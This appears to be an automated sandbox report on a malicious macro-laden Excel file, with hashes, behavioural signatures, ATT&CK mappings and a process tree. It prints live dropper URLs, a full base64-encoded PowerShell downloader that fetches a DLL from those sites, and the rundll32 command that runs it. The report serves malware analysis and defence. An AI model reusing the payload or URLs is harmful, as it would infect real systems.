b3696d2a2ca5cc82245002bd3c628cec835147e32691b99820f340f5a3ed7212

Analysis

max time kernel
118s
max time network
119s
platform
windows7_x64
resource
win7-20250207-en
resource tags

arch:x64arch:x86image:win7-20250207-enlocale:en-usos:windows7-x64system
submitted
27/03/2025, 19:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d286ca2b78e0ae4b035d47f12bcc5716.xls
Size

151KB
MD5

d286ca2b78e0ae4b035d47f12bcc5716
SHA1

a37c1586a48d4cffd2af18896828764c67096d88
SHA256

b3696d2a2ca5cc82245002bd3c628cec835147e32691b99820f340f5a3ed7212
SHA512

4e05626ac12373f0f37d66277cc7840e6c187210fe4fa5a87ceb463d63c999822108e93d71690ee9ad833a281323722c981c0c79061d5b3c742b96776b73be79
SSDEEP

3072:XcKoSsxzNDZLDZjlbR868O8KlVH3yehvMqAPjxO5xyZUE5V5xtezEVg8/dgL4Lcq:XcKoSsxzNDZLDZjlbR868O8KlVH3yehk

Score

10^/10

discovery

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://store.uxdsummit.com/wp-admin/VfgBSQa7Z/

exe.dropper

https://glowrentals.com/wp-admin/f1zeAKGTnS6I/

exe.dropper

http://candisee.bminteractivegroup.com/1g94ngo/2n7lJoPuPDEanPcX/

exe.dropper

http://bachilleratoporciclos.org/wp-content/zR/

exe.dropper

http://formula8020.com/css/JCuR6OE404DgR/

exe.dropper

http://lucasandbarbiehodges.net/wp-content/nbKbVJ8E55V2I/

exe.dropper

https://www.monet.kiev.ua/css/KvkD194/

exe.dropper

http://royalsnackmyanmar.com/wp-includes/Z4E3Vtp8k4Z/

exe.dropper

https://theclubgym.in/wp-includes/jnTMKV3pHa9a/

exe.dropper

https://ssf2.edelta.in/Themes/7hGzIAH5BYf9fFLK/

exe.dropper

https://subs.video/netreginstall/7LKhp4JjAyQ0mc/

exe.dropper

http://homedekornaturalcraft.com/ymu/fGsFT7j/

exe.dropper

http://gosporthistoryclub.org.uk/wp-content/vOixo/

exe.dropper

http://stimulusbrand.com/5qAhX5nC-content/1/

exe.dropper

https://readyplans.in/wp-content/UtiS4IPBYSIiaPzCCe/

exe.dropper

http://pgegroups.com/ism.pgegroups.com/HTv8/

exe.dropper

http://asaanweb.com/PHPMailer-master/1MYGpHszzRfHAN4/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	2864	1624	wscript.exe	27

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{4C916DA7-9DB8-4226-8DF6-78CE5CB5EC5A}\2.0	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\TypeLib\{4C916DA7-9DB8-4226-8DF6-78CE5CB5EC5A}\2.0\0\win32	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Wow6432Node\Interface	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\TypeLib\{4C916DA7-9DB8-4226-8DF6-78CE5CB5EC5A}\2.0\FLAGS	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText"	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1624	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2596	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2596	powershell.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
1624	EXCEL.EXE
1624	EXCEL.EXE
1624	EXCEL.EXE

Suspicious use of WriteProcessMemory 23 IoCs

description	pid	Process	procid_target
PID 1624 wrote to memory of 2864	1624	EXCEL.EXE	28
PID 1624 wrote to memory of 2864	1624	EXCEL.EXE	28
PID 1624 wrote to memory of 2864	1624	EXCEL.EXE	28
PID 1624 wrote to memory of 2864	1624	EXCEL.EXE	28
PID 2864 wrote to memory of 2732	2864	wscript.exe	30
PID 2864 wrote to memory of 2732	2864	wscript.exe	30
PID 2864 wrote to memory of 2732	2864	wscript.exe	30
PID 2864 wrote to memory of 2732	2864	wscript.exe	30
PID 2732 wrote to memory of 2596	2732	cmd.exe	32
PID 2732 wrote to memory of 2596	2732	cmd.exe	32
PID 2732 wrote to memory of 2596	2732	cmd.exe	32
PID 2732 wrote to memory of 2596	2732	cmd.exe	32
PID 2864 wrote to memory of 316	2864	wscript.exe	34
PID 2864 wrote to memory of 316	2864	wscript.exe	34
PID 2864 wrote to memory of 316	2864	wscript.exe	34
PID 2864 wrote to memory of 316	2864	wscript.exe	34
PID 316 wrote to memory of 876	316	cmd.exe	36
PID 316 wrote to memory of 876	316	cmd.exe	36
PID 316 wrote to memory of 876	316	cmd.exe	36
PID 316 wrote to memory of 876	316	cmd.exe	36
PID 316 wrote to memory of 876	316	cmd.exe	36
PID 316 wrote to memory of 876	316	cmd.exe	36
PID 316 wrote to memory of 876	316	cmd.exe	36

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\d286ca2b78e0ae4b035d47f12bcc5716.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1624
- C:\Windows\SysWOW64\wscript.exe
  wscript c:\programdata\tghklsd.vbs
  2⤵
  - Process spawned unexpected child process
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2864
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\programdata\jledshf.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2732
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -enc JABqAGUAbwBsAGkAcwBlADMAUgBoAGcARABaAFMANABjAGQAZgBnAD0AIgBoAHQAdABwAHMAOgAvAC8AcwB0AG8AcgBlAC4AdQB4AGQAcwB1AG0AbQBpAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAFYAZgBnAEIAUwBRAGEANwBaAC8ALABoAHQAdABwAHMAOgAvAC8AZwBsAG8AdwByAGUAbgB0AGEAbABzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBmADEAegBlAEEASwBHAFQAbgBTADYASQAvACwAaAB0AHQAcAA6AC8ALwBjAGEAbgBkAGkAcwBlAGUALgBiAG0AaQBuAHQAZQByAGEAYwB0AGkAdgBlAGcAcgBvAHUAcAAuAGMAbwBtAC8AMQBnADkANABuAGcAbwAvADIAbgA3AGwASgBvAFAAdQBQAEQARQBhAG4AUABjAFgALwAsAGgAdAB0AHAAOgAvAC8AYgBhAGMAaABpAGwAbABlAHIAYQB0AG8AcABvAHIAYwBpAGMAbABvAHMALgBvAHIAZwAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB6AFIALwAsAGgAdAB0AHAAOgAvAC8AZgBvAHIAbQB1AGwAYQA4ADAAMgAwAC4AYwBvAG0ALwBjAHMAcwAvAEoAQwB1AFIANgBPAEUANAAwADQARABnAFIALwAsAGgAdAB0AHAAOgAvAC8AbAB1AGMAYQBzAGEAbgBkAGIAYQByAGIAaQBlAGgAbwBkAGcAZQBzAC4AbgBlAHQALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AbgBiAEsAYgBWAEoAOABFADUANQBWADIASQAvACwAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBvAG4AZQB0AC4AawBpAGUAdgAuAHUAYQAvAGMAcwBzAC8ASwB2AGsARAAxADkANAAvACwAaAB0AHQAcAA6AC8ALwByAG8AeQBhAGwAcwBuAGEAYwBrAG0AeQBhAG4AbQBhAHIALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAFoANABFADMAVgB0AHAAOABrADQAWgAvACwAaAB0AHQAcABzADoALwAvAHQAaABlAGMAbAB1AGIAZwB5AG0ALgBpAG4ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBqAG4AVABNAEsAVgAzAHAASABhADkAYQAvACwAaAB0AHQAcABzADoALwAvAHMAcwBmADIALgBlAGQAZQBsAHQAYQAuAGkAbgAvAFQAaABlAG0AZQBzAC8ANwBoAEcAegBJAEEASAA1AEIAWQBmADkAZgBGAEwASwAvACwAaAB0AHQAcABzADoALwAvAHMAdQBiAHMALgB2AGkAZABlAG8ALwBuAGUAdAByAGUAZwBpAG4AcwB0AGEAbABsAC8ANwBMAEsAaABwADQASgBqAEEAeQBRADAAbQBjAC8ALABoAHQAdABwADoALwAvAGgAbwBtAGUAZABlAGsAbwByAG4AYQB0AHUAcgBhAGwAYwByAGEAZgB0AC4AYwBvAG0ALwB5AG0AdQAvAGYARwBzAEYAVAA3AGoALwAsAGgAdAB0AHAAOgAvAC8AZwBvAHMAcABvAHIAdABoAGkAcwB0AG8AcgB5AGMAbAB1AGIALgBvAHIAZwAuAHUAawAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB2AE8AaQB4AG8ALwAsAGgAdAB0AHAAOgAvAC8AcwB0AGkAbQB1AGwAdQBzAGIAcgBhAG4AZAAuAGMAbwBtAC8ANQBxAEEAaABYADUAbgBDAC0AYwBvAG4AdABlAG4AdAAvADEALwAsAGgAdAB0AHAAcwA6AC8ALwByAGUAYQBkAHkAcABsAGEAbgBzAC4AaQBuAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFUAdABpAFMANABJAFAAQgBZAFMASQBpAGEAUAB6AEMAQwBlAC8ALABoAHQAdABwADoALwAvAHAAZwBlAGcAcgBvAHUAcABzAC4AYwBvAG0ALwBpAHMAbQAuAHAAZwBlAGcAcgBvAHUAcABzAC4AYwBvAG0ALwBIAFQAdgA4AC8ALABoAHQAdABwADoALwAvAGEAcwBhAGEAbgB3AGUAYgAuAGMAbwBtAC8AUABIAFAATQBhAGkAbABlAHIALQBtAGEAcwB0AGUAcgAvADEATQBZAEcAcABIAHMAegB6AFIAZgBIAEEATgA0AC8AIgAuAHMAcABMAGkAVAAoACIALAAiACkAOwBmAE8AcgBlAGEAQwBoACgAJABqAGQAdABGAEoAZABYAGgAcgA2AHQAeAB5AGgAZAAgAGkAbgAgACQAagBlAG8AbABpAHMAZQAzAFIAaABnAEQAWgBTADQAYwBkAGYAZwApAHsAJAByAGgAeQBrAGEAagBkAGgAZgBzADcAaQBkAGYAZwBkAD0AIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAB2AGIAawB3AGsALgBkAGwAbAAiADsAaQBOAHYATwBrAGUALQB3AEUAYgByAGUAUQB1AGUAcwBUACAALQB1AFIAaQAgACQAagBkAHQARgBKAGQAWABoAHIANgB0AHgAeQBoAGQAIAAtAG8AdQBUAGYAaQBMAGUAIAAkAHIAaAB5AGsAYQBqAGQAaABmAHMANwBpAGQAZgBnAGQAOwAgAGkAZgAoAHQAZQBzAHQALQBwAEEAdABIACAAJAByAGgAeQBrAGEAagBkAGgAZgBzADcAaQBkAGYAZwBkACkAewBpAGYAKAAoAGcAZQB0AC0AaQBUAGUAbQAgACQAcgBoAHkAawBhAGoAZABoAGYAcwA3AGkAZABmAGcAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADQANQAwADAAMAApAHsAYgByAGUAYQBrADsAfQB9AH0A
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2596
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:316
  - - \??\c:\windows\syswow64\rundll32.exe
      c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd
      4⤵
      System Location Discovery: System Language Discovery
      PID:876

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\programdata\jledshf.bat

Filesize
3KB

MD5
b39bccb7919785949318f08668a8fdf6

SHA1
7cf362b654f6334a89c50a985e642370d7258826

SHA256
a5b67a81bf5b2c150a9157191e423e8ada6b033fa5335dfc1dc4389d137ba632

SHA512
4bdd93014d9a673aee38b5642d2fd1b20818cb19bc039d8440288bc04409f442b5eff3769893ec16029a4bafbb7673797cc77c1fcdd91694dd0841b00ee66102

Download Submit
\??\c:\programdata\tghklsd.vbs

Filesize
561B

MD5
87a9c41dc3e67b9b0b6cdb367d4858bd

SHA1
00f117f9a02dad3c127b2c607ead43300c2bebbe

SHA256
f0b09a17f07b03b8cfe1969f84fcfb96933439707fa86ba8aa79181145512e18

SHA512
7373ca3127a1baf85e3cc6beb7b046788132b1bb388405657cb924435386d186a2645971128dc582a970242c4a3dfdc7fcce78ed158b0d430c96bbd18686f1dd

Download Submit
memory/1624-5-0x00000000003F0000-0x00000000004F0000-memory.dmp

Filesize
1024KB

Download
memory/1624-74-0x00000000003F0000-0x00000000004F0000-memory.dmp

Filesize
1024KB

Download
memory/1624-7-0x00000000003F0000-0x00000000004F0000-memory.dmp

Filesize
1024KB

Download
memory/1624-9-0x00000000065A0000-0x00000000066A0000-memory.dmp

Filesize
1024KB

Download
memory/1624-8-0x00000000003F0000-0x00000000004F0000-memory.dmp

Filesize
1024KB

Download
memory/1624-6-0x00000000003F0000-0x00000000004F0000-memory.dmp

Filesize
1024KB

Download
memory/1624-1-0x00000000722FD000-0x0000000072308000-memory.dmp

Filesize
44KB

Download
memory/1624-11-0x00000000003F0000-0x00000000004F0000-memory.dmp

Filesize
1024KB

Download
memory/1624-12-0x00000000003F0000-0x00000000004F0000-memory.dmp

Filesize
1024KB

Download
memory/1624-14-0x00000000003F0000-0x00000000004F0000-memory.dmp

Filesize
1024KB

Download
memory/1624-42-0x0000000006020000-0x0000000006120000-memory.dmp

Filesize
1024KB

Download
memory/1624-13-0x00000000003F0000-0x00000000004F0000-memory.dmp

Filesize
1024KB

Download
memory/1624-10-0x00000000003F0000-0x00000000004F0000-memory.dmp

Filesize
1024KB

Download
memory/1624-71-0x0000000006020000-0x0000000006120000-memory.dmp

Filesize
1024KB

Download
memory/1624-4-0x00000000003F0000-0x00000000004F0000-memory.dmp

Filesize
1024KB

Download
memory/1624-70-0x0000000006020000-0x0000000006120000-memory.dmp

Filesize
1024KB

Download
memory/1624-77-0x00000000003F0000-0x00000000004F0000-memory.dmp

Filesize
1024KB

Download
memory/1624-76-0x00000000003F0000-0x00000000004F0000-memory.dmp

Filesize
1024KB

Download
memory/1624-79-0x0000000006020000-0x0000000006120000-memory.dmp

Filesize
1024KB

Download
memory/1624-78-0x0000000006020000-0x0000000006120000-memory.dmp

Filesize
1024KB

Download
memory/1624-75-0x00000000003F0000-0x00000000004F0000-memory.dmp

Filesize
1024KB

Download
memory/1624-72-0x00000000003F0000-0x00000000004F0000-memory.dmp

Filesize
1024KB

Download
memory/1624-3-0x00000000003F0000-0x00000000004F0000-memory.dmp

Filesize
1024KB

Download
memory/1624-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1624-84-0x00000000722FD000-0x0000000072308000-memory.dmp

Filesize
44KB

Download
memory/1624-85-0x00000000003F0000-0x00000000004F0000-memory.dmp

Filesize
1024KB

Download
memory/1624-86-0x0000000006020000-0x0000000006120000-memory.dmp

Filesize
1024KB

Download
memory/1624-87-0x0000000006020000-0x0000000006120000-memory.dmp

Filesize
1024KB

Download
memory/1624-88-0x0000000006020000-0x0000000006120000-memory.dmp

Filesize
1024KB

Download
memory/1624-89-0x00000000003F0000-0x00000000004F0000-memory.dmp

Filesize
1024KB

